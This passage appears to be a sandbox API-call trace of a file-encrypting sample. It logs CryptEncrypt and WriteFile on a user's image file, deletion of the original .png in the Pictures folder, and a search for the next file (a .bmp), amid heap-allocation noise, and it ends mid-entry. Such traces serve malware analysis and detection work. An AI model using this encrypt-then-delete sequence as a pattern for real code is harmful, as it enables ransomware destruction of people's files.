[0094.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cafe8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0094.373] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4525c88*, pdwDataLen=0x144e538*=0x541d, dwBufLen=0x5420 | out: pbData=0x4525c88*, pdwDataLen=0x144e538*=0x5420) returned 1 [0094.373] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0094.373] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0094.373] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.373] WriteFile (in: hFile=0x258, lpBuffer=0x4540160*, nNumberOfBytesToWrite=0x5420, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4540160*, lpNumberOfBytesWritten=0x144ef3c*=0x5420, lpOverlapped=0x0) returned 1 [0094.375] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0094.375] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.375] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca988, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0094.375] CryptDestroyKey (hKey=0x41ac140) returned 1 [0094.375] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0094.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0094.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.375] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0094.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0094.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.375] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.376] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0094.376] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0094.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0094.376] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0094.376] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.376] FreeLibrary (hLibModule=0x756e0000) returned 1 [0094.376] CloseHandle (hObject=0x298) returned 1 [0094.376] CloseHandle (hObject=0x258) returned 1 [0094.378] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\J06YyOv018ZbSPW7yM.png", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\J06YyOv018ZbSPW7yM.png", lpFilePart=0x0) returned 0x36 [0094.378] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\J06YyOv018ZbSPW7yM.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\j06yyov018zbspw7ym.png")) returned 0x20 [0094.378] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\J06YyOv018ZbSPW7yM.png", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51874400, ftCreationTime.dwHighDateTime=0x1d5e602, ftLastAccessTime.dwLowDateTime=0x470c54d0, ftLastAccessTime.dwHighDateTime=0x1d5e8db, ftLastWriteTime.dwLowDateTime=0x470c54d0, ftLastWriteTime.dwHighDateTime=0x1d5e8db, nFileSizeHigh=0x0, nFileSizeLow=0x541d, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="J06YyOv018ZbSPW7yM.png", cAlternateFileName="J06YYO~1.PNG")) returned 0x41ac100 [0094.379] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\J06YyOv018ZbSPW7yM.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\j06yyov018zbspw7ym.png")) returned 1 [0094.420] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51874400, ftCreationTime.dwHighDateTime=0x1d5e602, ftLastAccessTime.dwLowDateTime=0x470c54d0, ftLastAccessTime.dwHighDateTime=0x1d5e8db, ftLastWriteTime.dwLowDateTime=0x470c54d0, ftLastWriteTime.dwHighDateTime=0x1d5e8db, nFileSizeHigh=0x0, nFileSizeLow=0x541d, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="J06YyOv018ZbSPW7yM.png", cAlternateFileName="J06YYO~1.PNG")) returned 0 [0094.420] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0094.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0094.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0094.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0094.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0094.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d758 | out: hHeap=0x1780000) returned 1 [0094.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0094.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0094.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0094.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0094.420] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0094.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0094.420] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0094.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0094.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0094.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0094.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0094.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0094.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0094.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0094.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0094.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0094.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5358 | out: hHeap=0x1780000) returned 1 [0094.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0094.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0094.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0094.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0094.421] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0094.421] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0094.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0094.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0094.421] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0094.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0094.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0094.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0094.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23d0 [0094.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0094.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0094.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0094.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0094.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0094.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0094.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0094.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0094.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a558 [0094.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0094.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0094.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0094.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0094.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5358 [0094.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a558 | out: hHeap=0x1780000) returned 1 [0094.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0094.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0094.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0094.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0094.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca040 [0094.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0094.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0094.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0094.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0094.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0094.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0094.422] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0094.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0094.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0094.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0094.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0094.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0094.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0094.423] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0094.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0094.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0094.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0094.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0094.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0094.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0094.423] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\maAjSjcXjKdUlEc2T.bmp", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37446c80, ftCreationTime.dwHighDateTime=0x1d5e5da, ftLastAccessTime.dwLowDateTime=0x8aa363d0, ftLastAccessTime.dwHighDateTime=0x1d5e73e, ftLastWriteTime.dwLowDateTime=0x8aa363d0, ftLastWriteTime.dwHighDateTime=0x1d5e73e, nFileSizeHigh=0x0, nFileSizeLow=0xf6d5, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="maAjSjcXjKdUlEc2T.bmp", cAlternateFileName="MAAJSJ~1.BMP")) returned 0x41ac640 [0094.423] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0094.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0094.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0094.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0094.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0094.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0094.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0094.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0094.424] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0094.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0094.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0094.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0094.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2340 [0094.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0094.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0094.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0094.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0094.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0094.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca130 [0094.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0094.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0094.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0094.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0094.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0094.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0094.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0094.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0094.424] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0094.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0094.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0094.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0094.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0094.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0094.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0094.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0094.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0094.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0094.425] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0094.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0094.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0094.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0094.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0094.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0094.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0094.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0094.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0094.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0094.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0094.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0094.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0094.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0094.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24b0 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0094.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca070 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0094.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0094.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0094.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0094.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0094.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0094.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0094.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0094.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0094.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0094.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0094.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0094.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0094.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0094.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0094.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0094.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0094.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0094.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0094.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0094.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0094.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0094.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0094.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0094.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 